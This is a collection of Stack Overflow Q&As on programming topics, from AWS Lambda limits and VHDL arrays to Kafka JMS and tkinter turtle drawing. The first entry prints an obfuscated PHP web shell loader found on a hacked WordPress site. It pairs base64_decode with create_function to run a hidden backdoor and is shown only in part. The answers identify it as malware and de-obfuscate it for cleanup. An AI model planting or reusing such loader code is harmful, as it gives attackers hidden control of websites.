"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652608"
} |
8cc1f2aaef460785506c6ee1308d4d71cee2532f | Stackoverflow Stackexchange
Q: corrupted / hacked common.php file? I am having issues with one of my WordPress sites (it constantly logs users out and does not let people log in).
My hosting provider thinks the root of the problem is the common.php file (/public_html/wp-content/common.php).
Can anyone shed any light on what the files is actually doing? Can I just delete it and will WordPress generate a new file?
common.php code:
<?php
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
*I've had to cut out a lot of the code here as it was over the character limit (about 90,000 characters!)
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
Thanks in advance
Rich
A: Delete the file.
It is not a part of the WordPress install or upgrade package. I would assume that the file is malicious and that your hosting account/personal machine/login credentials have been compromised or something like that.
This is the standard support doc referred to in this case: https://codex.wordpress.org/FAQ_My_site_was_hacked Then once your site is clean:
http://codex.wordpress.org/Hardening_WordPress
| Q: corrupted / hacked common.php file? I am having issues with one of my WordPress sites (it constantly logs users out and does not let people log in).
My hosting provider thinks the root of the problem is the common.php file (/public_html/wp-content/common.php).
Can anyone shed any light on what the files is actually doing? Can I just delete it and will WordPress generate a new file?
common.php code:
<?php
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
*I've had to cut out a lot of the code here as it was over the character limit (about 90,000 characters!)
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
Thanks in advance
Rich
A: Delete the file.
It is not a part of the WordPress install or upgrade package. I would assume that the file is malicious and that your hosting account/personal machine/login credentials have been compromised or something like that.
This is the standard support doc referred to in this case: https://codex.wordpress.org/FAQ_My_site_was_hacked Then once your site is clean:
http://codex.wordpress.org/Hardening_WordPress
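For the record, the obfuscation is thin and decodes cleanly: the index loop over $alphabet spells out base64_decode, and strrev("noi"."tcnuf"."_eta"."erc") is create_function, so the snippet is equivalent to the sketch below. The decoded payload even sets an $auth_pass, the signature of a password-protected web shell.
<?php
// de-obfuscated equivalent of common.php
$payload = base64_decode($string);   // $string is the long base64 blob
$f = create_function('', $payload);  // wrap the decoded PHP in a function
$f();                                // and execute it: a remotely controlled backdoor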
| stackoverflow | {
"language": "en",
"length": 170,
"provenance": "stackexchange_0000F.jsonl.gz:900238",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652663"
} |
dedcf1d114686a33e871235e62ccb58381a4f47b | Stackoverflow Stackexchange
Q: Loading large python packages into AWS lambda function I can't seem to get around this (below-mentioned) error while trying to upload a function onto AWS Lambda:
The Code tab failed to save. Reason: Unzipped size must be smaller than 262144000 bytes
I've zipped the function and all of its dependencies, uploaded the zipped file to S3, and pasted the file's S3 URL at the Lambda prompt (upload a file from Amazon S3).
Any leads would be appreciated. Thanks
A: Adding to Entropic's answer, what about using something like pyminifier? This could be a very simple solution if the minification it performs is enough to get the package under the 250 MB limit.
Also, if you are using the AWS SDK, you do not need to include it in your package as it is included in the Lambda execution environment. This could also save some space if it is the case.
| Q: Loading large python packages into AWS lambda function I can't seem to get around this (below-mentioned) error while trying to upload a function onto AWS Lambda:
The Code tab failed to save. Reason: Unzipped size must be smaller than 262144000 bytes
I've zipped the function and all of its dependencies, uploaded the zipped file to S3, and pasted the file's S3 URL at the Lambda prompt (upload a file from Amazon S3).
Any leads would be appreciated. Thanks
A: Adding to Entropic's answer, what about using something like pyminifier? This could be a very simple solution if the minification it performs is enough to get the package under the 250 MB limit.
Also, if you are using the AWS SDK, you do not need to include it in your package as it is included in the Lambda execution environment. This could also save some space if it is the case.
A: As kosa mentioned there is a hard limit at 250MB. This reddit thread had a few good ideas:
https://www.reddit.com/r/aws/comments/4qrw9m/how_to_work_around_aws_lambdas_250mb_limit/
Most solutions are along the lines of: 1) loading more code later, thus getting around the 250 MB limit; 2) splitting the code into smaller pieces, which is more AWS-Lambda-ish anyway; and 3) using the strip command like this guy: https://serverlesscode.com/post/scikitlearn-with-amazon-linux-container/
2 is probably the best way to go, if you can split it up.
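A sketch of the strip approach from option 3, assuming the dependencies are staged in a package/ directory before zipping (debug symbols in compiled shared objects account for much of the bulk of scientific Python packages):
# strip debug symbols from native libraries, then build the deployment zip
find package/ -name "*.so" | xargs strip
zip -r9 lambda-function.zip package/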
| stackoverflow | {
"language": "en",
"length": 223,
"provenance": "stackexchange_0000F.jsonl.gz:900251",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652729"
} |
8d7efc1085e2eb6a19350d5e51d585569980ecbd | Stackoverflow Stackexchange
Q: VHDL 2D Array Initialization using single Index type kelvin_Array is array(0 to 3, 0 to 1) of integer
signal array_int1 :kelvin_Array;
signal array_int2 :kelvin_Array;
begin
array_int1 (0,0) <= 5; --using 2 indexes
what I wanted is
array_int1(0) <= (5,3);
Please let me know how can I achieve this.
Regards,
Kelvin
A: It looks like you want a single dimensional array of a single dimensional array of two integers, eg:
type matthew_Array is array(0 to 1) of integer;
type matthew_Array_Array is array(0 to 9) of matthew_Array;
signal array_int1 : matthew_Array_Array;
begin
array_int1(0) <= (5,3);
https://www.edaplayground.com/x/5Lz8
| Q: VHDL 2D Array Initialization using single Index type kelvin_Array is array(0 to 3, 0 to 1) of integer
signal array_int1 :kelvin_Array;
signal array_int2 :kelvin_Array;
begin
array_int1 (0,0) <= 5; --using 2 indexes
what I wanted is
array_int1(0) <= (5,3);
Please let me know how can I achieve this.
Regards,
Kelvin
A: It looks like you want a single dimensional array of a single dimensional array of two integers, eg:
type matthew_Array is array(0 to 1) of integer;
type matthew_Array_Array is array(0 to 9) of matthew_Array;
signal array_int1 : matthew_Array_Array;
begin
array_int1(0) <= (5,3);
https://www.edaplayground.com/x/5Lz8
| stackoverflow | {
"language": "en",
"length": 95,
"provenance": "stackexchange_0000F.jsonl.gz:900271",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652782"
} |
916c526b1b1bc8fabf5089db9e549bbafa4fec2a | Stackoverflow Stackexchange
Q: reset or reload the same page in Angular 2 I am trying to reload the same url in Angular 2 by using router.navigate but it is not working.
Url: http://localhost:3000/page1
Scenario: I am on http://localhost:3000/landing and on click of button, will pass routing parameter which should reload the page.
Example:
Suppose the user is on page1 (an edit form) and the URL reads localhost:3000/page1, and there is a Create new button; on click of the button, a routing parameter is passed using
let navigationExtras: NavigationExtras = { queryParams: { "refresh": "Y" } };
this.router.navigate(['page1'], navigationExtras);
A: ngOnInit is only called when the component is created. When you navigate to the same page (with different url parameters) the ngOnInit method is not recalled. You should use the ActivatedRoute Params Observable
import { ActivatedRoute } from '@angular/router';
export class MyComponent implements OnInit {
constructor(private _activatedRoute: ActivatedRoute){}
ngOnInit(){
this._activatedRoute.params.subscribe(
params => {
// this is called every time the URL parameters change
});
}
}
| Q: reset or reload the same page in Angular 2 I am trying to reload the same url in Angular 2 by using router.navigate but it is not working.
Url: http://localhost:3000/page1
Scenario: I am on http://localhost:3000/landing and on click of button, will pass routing parameter which should reload the page.
Example:
Suppose the user is on page1 (an edit form) and the URL reads localhost:3000/page1, and there is a Create new button; on click of the button, a routing parameter is passed using
let navigationExtras: NavigationExtras = { queryParams: { "refresh": "Y" } };
this.router.navigate(['page1'], navigationExtras);
A: ngOnInit is only called when the component is created. When you navigate to the same page (with different url parameters) the ngOnInit method is not recalled. You should use the ActivatedRoute Params Observable
import { ActivatedRoute } from '@angular/router';
export class MyComponent implements OnInit {
constructor(private _activatedRoute: ActivatedRoute){}
ngOnInit(){
this._activatedRoute.params.subscribe(
params => {
// this is called every time the URL parameters change
});
}
}
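Since the navigation in the question passes queryParams rather than route params, the same pattern applies to the queryParams observable — a sketch using the refresh flag from the question:
this._activatedRoute.queryParams.subscribe(
  params => {
    if (params['refresh'] === 'Y') {
      // re-run the page's initialization / reset logic here
    }
  }
);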
A: You just need to call window.location.reload();
| stackoverflow | {
"language": "en",
"length": 164,
"provenance": "stackexchange_0000F.jsonl.gz:900274",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652789"
} |
2e170d20195da81d563868565287e5b010547e80 | Stackoverflow Stackexchange
Q: Connect JMS client to Apache Kafka I have a 3rd party system pumping data into HornetQ using JMS. I need to replace HornetQ with Kafka, but I cannot change the 3rd party system. What is the correct way to get the data into Kafka?
I googled around and found JMS-Client and Kafka Connect. After reading both sets of documentation, I'm confused and not sure which one is the right one.
Has anyone any experience with this and can give me some hints on how to do this?
A: The right way is to use the JMS-Client because it's an implementation of the JMS API specification but with the Kafka wire protocol. It means that you can use this client in your 3rd party system and use Kafka instead of HornetQ on the other side. It means that at least you need to add this dependency to the 3rd party system in order to use this JMS implementation for Kafka instead of the HornetQ one.
| Q: Connect JMS client to Apache Kafka I have a 3rd party system pumping data into HornetQ using JMS. I need to replace HornetQ with Kafka, but I cannot change the 3rd party system. What is the correct way to get the data into Kafka?
I googled around and found JMS-Client and Kafka Connect. After reading both sets of documentation, I'm confused and not sure which one is the right one.
Has anyone any experience with this and can give me some hints on how to do this?
A: The right way is to use the JMS-Client because it's an implementation of the JMS API specification but with the Kafka wire protocol. It means that you can use this client in your 3rd party system and use Kafka instead of HornetQ on the other side. It means that at least you need to add this dependency to the 3rd party system in order to use this JMS implementation for Kafka instead of the HornetQ one.
A: Use the Kafka JMS Client when you want to replace a JMS Broker with Apache Kafka
Use the Kafka JMS Connector when you want to integrate Kafka with a legacy JMS broker and send messages between the two different systems.
| stackoverflow | {
"language": "en",
"length": 203,
"provenance": "stackexchange_0000F.jsonl.gz:900312",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652907"
} |
6313342958c263f9231b33ca501b2c1da4de8bf7 | Stackoverflow Stackexchange
Q: Bitbucket Pipeline INSTALL_PARSE_FAILED_NO_CERTIFICATES Issue
I generated the build (APK) using a Bitbucket pipeline with the help of the link.
While trying to run the apk I am getting this issue
INSTALL_PARSE_FAILED_NO_CERTIFICATES. I couldn't find a solution for how to include the default keystore file details in Bitbucket.
A:
Fixed this issue by making some changes in the build.sh file.
#!/bin/bash
./gradlew $1:assembleDebug || exit 1
BRANCH_NAME=$2
mkdir -p ~/.ssh
(umask 077 ; echo $BUILD_KEY | base64 --decode > ~/.ssh/id_rsa)
chmod 600 ~/.ssh/id_rsa
TOSEND=$BITBUCKET_COMMIT
if [ "$3" == "true" ]
then
if [ "$1" == "venkat" ]
then
ssh -i ~/.ssh/id_rsa [email protected] mkdir -p build/androidsdk/${BRANCH_NAME}/$TOSEND
scp -i ~/.ssh/id_rsa venkat/build/outputs/aar/venkat-debug.aar [email protected]:build/androidsdk/${BRANCH_NAME}/$TOSEND || exit 1
fi
if [ "$1" == "app" ]
then
ssh -i ~/.ssh/id_rsa [email protected] mkdir -p build/androidtestapp/${BITBUCKET_BRANCH}/$TOSEND
scp -i ~/.ssh/id_rsa app/build/outputs/apk/app-debug.apk [email protected]:build/androidtestapp/${BITBUCKET_BRANCH}/$TOSEND || exit 1
fi
fi
Now the build is successfully generated and can be installed on devices.
| Q: Bitbucket Pipeline INSTALL_PARSE_FAILED_NO_CERTIFICATES Issue
I generated the build (APK) using a Bitbucket pipeline with the help of the link.
While trying to run the apk I am getting this issue
INSTALL_PARSE_FAILED_NO_CERTIFICATES. I couldn't find a solution for how to include the default keystore file details in Bitbucket.
A:
Fixed this issue by making some changes in the build.sh file.
#!/bin/bash
./gradlew $1:assembleDebug || exit 1
BRANCH_NAME=$2
mkdir -p ~/.ssh
(umask 077 ; echo $BUILD_KEY | base64 --decode > ~/.ssh/id_rsa)
chmod 600 ~/.ssh/id_rsa
TOSEND=$BITBUCKET_COMMIT
if [ "$3" == "true" ]
then
if [ "$1" == "venkat" ]
then
ssh -i ~/.ssh/id_rsa [email protected] mkdir -p build/androidsdk/${BRANCH_NAME}/$TOSEND
scp -i ~/.ssh/id_rsa venkat/build/outputs/aar/venkat-debug.aar [email protected]:build/androidsdk/${BRANCH_NAME}/$TOSEND || exit 1
fi
if [ "$1" == "app" ]
then
ssh -i ~/.ssh/id_rsa [email protected] mkdir -p build/androidtestapp/${BITBUCKET_BRANCH}/$TOSEND
scp -i ~/.ssh/id_rsa app/build/outputs/apk/app-debug.apk [email protected]:build/androidtestapp/${BITBUCKET_BRANCH}/$TOSEND || exit 1
fi
fi
Now the build is successfully generated and can be installed on devices.
| stackoverflow | {
"language": "en",
"length": 144,
"provenance": "stackexchange_0000F.jsonl.gz:900377",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653139"
} |
f3f83a6564c042117beb2a770ce24a5c57e47cb5 | Stackoverflow Stackexchange
Q: Are there examples of using reinforcement learning for text classification? Imagine a binary classification problem like sentiment analysis. Since we have the labels, cant we use the gap between actual - predicted as reward for RL ?
I wish to try Reinforcement Learning for Classification Problems
A: Interesting thought! According to my knowledge it can be done.
*
*Imitation Learning - On a high level it is observing sample trajectories performed by the agent in the environment and use it to predict the policy given a particular stat configuration. I prefer Probabilistic Graphical Models for the prediction since I have more interpretability in the model. I have implemented a similar algorithm from the research paper: http://homes.soic.indiana.edu/natarasr/Papers/ijcai11_imitation_learning.pdf
*Inverse Reinforcement Learning - Again a similar method developed by Andrew Ng from Stanford to find the reward function from sample trajectories, and the reward function can be used to frame the desirable actions.
http://ai.stanford.edu/~ang/papers/icml00-irl.pdf
| Q: Are there examples of using reinforcement learning for text classification? Imagine a binary classification problem like sentiment analysis. Since we have the labels, cant we use the gap between actual - predicted as reward for RL ?
I wish to try Reinforcement Learning for Classification Problems
A: Interesting thought! According to my knowledge it can be done.
*
*Imitation Learning - On a high level it is observing sample trajectories performed by the agent in the environment and use it to predict the policy given a particular stat configuration. I prefer Probabilistic Graphical Models for the prediction since I have more interpretability in the model. I have implemented a similar algorithm from the research paper: http://homes.soic.indiana.edu/natarasr/Papers/ijcai11_imitation_learning.pdf
*Inverse Reinforcement Learning - Again a similar method developed by Andrew Ng from Stanford to find the reward function from sample trajectories, and the reward function can be used to frame the desirable actions.
http://ai.stanford.edu/~ang/papers/icml00-irl.pdf
| stackoverflow | {
"language": "en",
"length": 152,
"provenance": "stackexchange_0000F.jsonl.gz:900390",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653180"
} |
b272a68762b94a3cc80503deb65968360382e422 | Stackoverflow Stackexchange
Q: How to zip multiple lists using java 8? Given :
List<Integer> a = Arrays.asList(1,2,3);
List<Integer> b = Arrays.asList(1,2,3);
List<Integer> c = Arrays.asList(1,2,3);
List<Integer> d = Arrays.asList(1,2,3);
List<List<Integer>> sample = Arrays.asList(a,b,c,d);
How can I get this result with java 8?
[(1,1,1,1),(2,2,2,2),(3,3,3,3)]
A: /**
* Zips lists. E.g. given [[1,2,3],[4,5,6]], returns [[1,4],[2,5],[3,6]].
* @param listOfLists an N x M list
* @returns an M x N list
*/
static <T> List<List<T>> zip(List<List<T>> listOfLists) {
int size = listOfLists.get(0).size();
List<List<T>> result = new ArrayList<>(size);
for (int i = 0; i < size; ++i)
result.add(
listOfLists.stream()
.map(list -> list.get(i))
.collect(toList()));
return result;
}
| Q: How to zip multiple lists using java 8? Given :
List<Integer> a = Arrays.asList(1,2,3);
List<Integer> b = Arrays.asList(1,2,3);
List<Integer> c = Arrays.asList(1,2,3);
List<Integer> d = Arrays.asList(1,2,3);
List<List<Integer>> sample = Arrays.asList(a,b,c,d);
How can I get this result with java 8?
[(1,1,1,1),(2,2,2,2),(3,3,3,3)]
A: /**
* Zips lists. E.g. given [[1,2,3],[4,5,6]], returns [[1,4],[2,5],[3,6]].
* @param listOfLists an N x M list
* @returns an M x N list
*/
static <T> List<List<T>> zip(List<List<T>> listOfLists) {
int size = listOfLists.get(0).size();
List<List<T>> result = new ArrayList<>(size);
for (int i = 0; i < size; ++i)
result.add(
listOfLists.stream()
.map(list -> list.get(i))
.collect(toList()));
return result;
}
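Applied to the sample from the question, a quick sanity check (assuming a static import of Collectors.toList, as the code above implies):
System.out.println(zip(sample)); // prints [[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]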
A: Java streams don't natively support zipping.
If you want to do it manually, then using an IntStream as an 'iterator' over the lists is the way to go:
List<Integer> l1 = Arrays.asList(1, 2, 3);
List<Integer> l2 = Arrays.asList(2, 3, 4);
List<Object[]> zipped = IntStream.range(0, 3).mapToObj(i -> new Object[]{l1.get(i), l2.get(i)}).collect(Collectors.toList());
zipped.stream().forEach(i -> System.out.println(i[0] + " " + i[1]));
This is ugly, however, and not the 'java' way (as in using an array of 'properties' instead of a class).
A: If we consider that all the Lists have the same size, then why Java 8? You can just use a simple loop like this:
List<List<Integer>> list = new ArrayList<>();
for(int i = 0; i<a.size(); i++){
list.add(Arrays.asList(a.get(i), b.get(i), c.get(i), d.get(i)));
}
Output
[[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]
I really insist that you read this post: Is using Lambda expressions whenever possible in java good practice?
A: If I understand your question correctly, you need something like this:
private <T> List<List<T>> zip(Stream<Iterable<T>> stream) {
return stream.collect(LinkedList::new,
(lists, ts) -> {
if (lists.isEmpty()) {
ts.forEach(t -> lists.add(new LinkedList<T>() {{
add(t);
}}));
} else {
Iterator<List<T>> listIterator = lists.iterator();
Iterator<T> elementIterator = ts.iterator();
while (listIterator.hasNext() && elementIterator.hasNext()) {
listIterator.next().add(elementIterator.next());
}
while (listIterator.hasNext()) {
listIterator.next();
listIterator.remove();
}
}
}, (lists, lists2) -> {
Iterator<List<T>> firstListIterator = lists.iterator();
Iterator<List<T>> secondListIterator = lists2.iterator();
while (firstListIterator.hasNext() && secondListIterator.hasNext()) {
firstListIterator.next().addAll(secondListIterator.next());
}
while (firstListIterator.hasNext()) {
firstListIterator.next();
firstListIterator.remove();
}
});
}
And you can get desired results with
System.out.println(zip(sample.stream()));
| stackoverflow | {
"language": "en",
"length": 346,
"provenance": "stackexchange_0000F.jsonl.gz:900471",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653421"
} |
8d41bed6aac896eec60bb095294a022786497e5f | Stackoverflow Stackexchange
Q: c++ - protobuf vs rapidjson data format using rapidJSON I am able to store data of any type (supported by rapidJSON) as value against a key. Can I do that in protobuf? If so, how?
The reason I opted for protobuf over rapidJSON is because of its speed (and key comparison in rapidJSON is really a "string" comparison which is costly).
Or is there any alternative to that? maybe flatbuffers?
Requirement is storing data of any type against an int type key. Faster serialization/deserialization than regular json.
Looking for answers from C++ perspective.
A: In protobuf, you typically have a fixed contract that pre-interprets given keys as given types, but there is also the concept of extensions. With an extension, arbitrary data can be stored against field numbers; this works for any type that could also have been expressed using the regular API.
The convenience and performance of the extension API depends on the implementation, but it should be perfectly usable from the official C++ API.
The key point about extensions is that only the consumer needs to understand them.
| Q: c++ - protobuf vs rapidjson data format using rapidJSON I am able to store data of any type (supported by rapidJSON) as value against a key. Can I do that in protobuf? If so, how?
The reason I opted for protobuf over rapidJSON is because of its speed (and key comparison in rapidJSON is really a "string" comparison which is costly).
Or is there any alternative to that? maybe flatbuffers?
Requirement is storing data of any type against an int type key. Faster serialization/deserialization than regular json.
Looking for answers from C++ perspective.
A: In protobuf, you typically have a fixed contract that pre-interprets given keys as given types, but there is also the concept of extensions. With an extension, arbitrary data can be stored against field numbers; this works for any type that could also have been expressed using the regular API.
The convenience and performance of the extension API depends on the implementation, but it should be perfectly usable from the official C++ API.
The key point about extensions is that only the consumer needs to understand them.
A: Both Protobuf and FlatBuffers have a dictionary feature (see https://developers.google.com/protocol-buffers/docs/proto#maps and https://google.github.io/flatbuffers/md__cpp_usage.html under dictionaries). The big problem you may have with both, however, is that it is not convenient to have the value be an arbitrary type, since both are defined by a schema, meaning you have to specify an actual type for the value. You can get around that by defining unions of all possible types, but it is never as convenient as JSON.
FlatBuffers however has a dedicated format for storing any value without a schema: https://google.github.io/flatbuffers/flexbuffers.html. This is a lot faster than JSON, more compact, and uses less extra memory to read (none).
FlatBuffers has the ability to use an int as key, but FlexBuffers doesn't yet, so you could consider storing a FlexBuffer as value inside a FlatBuffer int dictionary.
Both format parse from JSON and output to JSON, even when nested.
FlexBuffers can't be modified in-place. FlatBuffers can, using its object API. So again nesting could work well as long as you're ok re-generating the entire FlexBuffer value when it changes.
A final alternative worth mentioning is a std::map<int, std::vector<uint8_t>> (or unordered_map) to store a map of FlexBuffers directly. That is simpler, but now the problem you have is not having a convenient way to store the whole thing.
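For reference, the protobuf map feature mentioned above looks roughly like this in a proto3 schema — a sketch that also makes the stated limitation visible, since the value type is fixed by the schema:
syntax = "proto3";

message Store {
  // int key -> value; the value must be a single declared type
  map<int32, bytes> values = 1;
}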
| stackoverflow | {
"language": "en",
"length": 392,
"provenance": "stackexchange_0000F.jsonl.gz:900474",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653430"
} |
cdb90028949cddeadafcd6338514b234333e11df | Stackoverflow Stackexchange
Q: Accessing React.DOM.input has been deprecated will be removed in v16.0+? A warning occurred on my new React project
Accessing factories like React.DOM.input has been deprecated and will be removed in v16.0+. Use the react-dom-factories package instead. Version 1.0 provides a drop-in replacement. For more info, see.......
Anyone encountering same problem ? How to solve it ?
A: DOM.input is a factory, a function which returns a React Element (something that can be rendered by React). Either you're using this directly in your code, for example:
class MyInput extends Component {
render() {
return DOM.input(props, children);
}
}
or some library that you're using is doing so.
Instead of using DOM from the React package, you should install a separate package, react-dom-factories, and use DOM from there.
Alternatively, you can enable JSX and use <input> instead.
| Q: Accessing React.DOM.input has been deprecated will be removed in v16.0+? A warning occurred on my new React project
Accessing factories like React.DOM.input has been deprecated and will be removed in v16.0+. Use the react-dom-factories package instead. Version 1.0 provides a drop-in replacement. For more info, see.......
Anyone encountering the same problem? How to solve it?
A: DOM.input is a factory, a function which returns a React Element (something that can be rendered by React). Either you're using this directly in your code, for example:
class MyInput extends Component {
render() {
return DOM.input(props, children);
}
}
or some library that you're using is doing so.
Instead of using DOM from the React package, you should install a separate package, react-dom-factories, and use DOM from there.
Alternatively, you can enable JSX and use <input> instead.
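A drop-in usage sketch of that package (assuming it has been installed via npm):
const DOM = require('react-dom-factories');
// same call shape as the deprecated React.DOM.input
const element = DOM.input(props, children);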
| stackoverflow | {
"language": "en",
"length": 136,
"provenance": "stackexchange_0000F.jsonl.gz:900485",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653457"
} |
786d365d836263242b1d669a044a7ad3f69f4b49 | Stackoverflow Stackexchange
Q: Gcov report import in Sonarqube-5.6.6(LTS) using CXX Community Plug-in Our Sonar Build Environment details as follows:
SonarQube Server Version - 5.6.6 (64-Bit).
Sonar Client Build Operating System – Ubuntu 14.04.5 LTS (64-Bit).
Sonar-scanner- Version - 3.0.3.778.
sonar-cxx-plugin-0.9.7.jar
Source Code Language: C++
Description:-
I have .gcov coverage report. Want to know is it possible to import into Sonarqube dashboard using Cxx community plugin?
If so, kindly help me with the steps. Thanks in advance.
A: Use absolute filename path in gcovr report solved for me.
sonar config file: sonar-project.properties
sonar.projectKey=xxx
sonar.sources=src
sonar.host.url=http://xxx:xxx
sonar.login=xxx
sonar.language=c++
sonar.cxx.includeDirectories=xxx
sonar.exclusions=xxx
sonar.cxx.coverage.reportPath=gcovr_report.xml
sonar.cxx.coverage.itReportPath=gcovr_report.xml
sonar.cxx.coverage.overallReportPath=gcovr_report.xml
The gcov temp files (gcda/gcno) are in the directory /xxx/src.
Create the gcovr XML report: gcovr -r /xxx/src --xml-pretty > gcovr_report.xml
Replace the filename tags in gcovr_report.xml with absolute paths.
Run the sonar scanner: ~/sonar-scanner-3.0.3.778-linux/bin/sonar-scanner -X
| Q: Gcov report import in Sonarqube-5.6.6(LTS) using CXX Community Plug-in Our Sonar Build Environment details as follows:
SonarQube Server Version - 5.6.6 (64-Bit).
Sonar Client Build Operating System – Ubuntu 14.04.5 LTS (64-Bit).
Sonar-scanner- Version - 3.0.3.778.
sonar-cxx-plugin-0.9.7.jar
Source Code Language: C++
Description:-
I have a .gcov coverage report. Is it possible to import it into the SonarQube dashboard using the CXX community plugin?
If so, kindly help me with the steps. Thanks in advance.
A: Use absolute filename path in gcovr report solved for me.
sonar config file: sonar-project.properties
sonar.projectKey=xxx
sonar.sources=src
sonar.host.url=http://xxx:xxx
sonar.login=xxx
sonar.language=c++
sonar.cxx.includeDirectories=xxx
sonar.exclusions=xxx
sonar.cxx.coverage.reportPath=gcovr_report.xml
sonar.cxx.coverage.itReportPath=gcovr_report.xml
sonar.cxx.coverage.overallReportPath=gcovr_report.xml
The gcov temp files (gcda/gcno) are in the directory /xxx/src.
Create the gcovr XML report: gcovr -r /xxx/src --xml-pretty > gcovr_report.xml
Replace the filename tags in gcovr_report.xml with absolute paths.
Run the sonar scanner: ~/sonar-scanner-3.0.3.778-linux/bin/sonar-scanner -X
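For the "replace filename tags" step, a hypothetical one-liner (adjust /xxx/src/ to the real absolute source root):
sed -i 's|filename="|filename="/xxx/src/|g' gcovr_report.xml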
| stackoverflow | {
"language": "en",
"length": 129,
"provenance": "stackexchange_0000F.jsonl.gz:900486",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653458"
} |
fb6e4049e4ddf27873cae567db536ec7ba2a99c6 | Stackoverflow Stackexchange
Q: Integrate turtle module with tkinter canvas I am trying to integrate the Turtle module into an interface I have created with Tkinter; currently I have a canvas that I would like the turtle to draw to (see example 1). However, I am lost on how to get it to draw there.
A: Try this:
import turtle
import tkinter as tk
def forward():
t.forward(100)
def back():
t.back(100)
def left():
t.left(90)
def right():
t.right(90)
root = tk.Tk()
canvas = tk.Canvas(master = root, width = 500, height = 500)
canvas.pack()
t = turtle.RawTurtle(canvas)
t.pencolor("#ff0000") # Red
t.penup() # Regarding one of the comments
t.pendown() # Regarding one of the comments
tk.Button(master = root, text = "Forward", command = forward).pack(side = tk.LEFT)
tk.Button(master = root, text = "Back", command = back).pack(side = tk.LEFT)
tk.Button(master = root, text = "Left", command = left).pack(side = tk.LEFT)
tk.Button(master = root, text = "Right", command = right).pack(side = tk.LEFT)
root.mainloop()
I have never used this module before but what I have written seems to do what you want.
References:
*
*http://www.eg.bucknell.edu/~hyde/Python3/TurtleDirections.html
*https://www.reddit.com/r/learnpython/comments/4qdcmw/can_you_add_turtle_graphics_to_a_tkinter_window/
| Q: Integrate turtle module with tkinter canvas I am trying to integrate the Turtle module into an interface I have created with Tkinter; currently I have a canvas that I would like the turtle to draw to (see example 1). However, I am lost on how to get it to draw there.
A: Try this:
import turtle
import tkinter as tk
def forward():
t.forward(100)
def back():
t.back(100)
def left():
t.left(90)
def right():
t.right(90)
root = tk.Tk()
canvas = tk.Canvas(master = root, width = 500, height = 500)
canvas.pack()
t = turtle.RawTurtle(canvas)
t.pencolor("#ff0000") # Red
t.penup() # Regarding one of the comments
t.pendown() # Regarding one of the comments
tk.Button(master = root, text = "Forward", command = forward).pack(side = tk.LEFT)
tk.Button(master = root, text = "Back", command = back).pack(side = tk.LEFT)
tk.Button(master = root, text = "Left", command = left).pack(side = tk.LEFT)
tk.Button(master = root, text = "Right", command = right).pack(side = tk.LEFT)
root.mainloop()
I have never used this module before but what I have written seems to do what you want.
References:
*
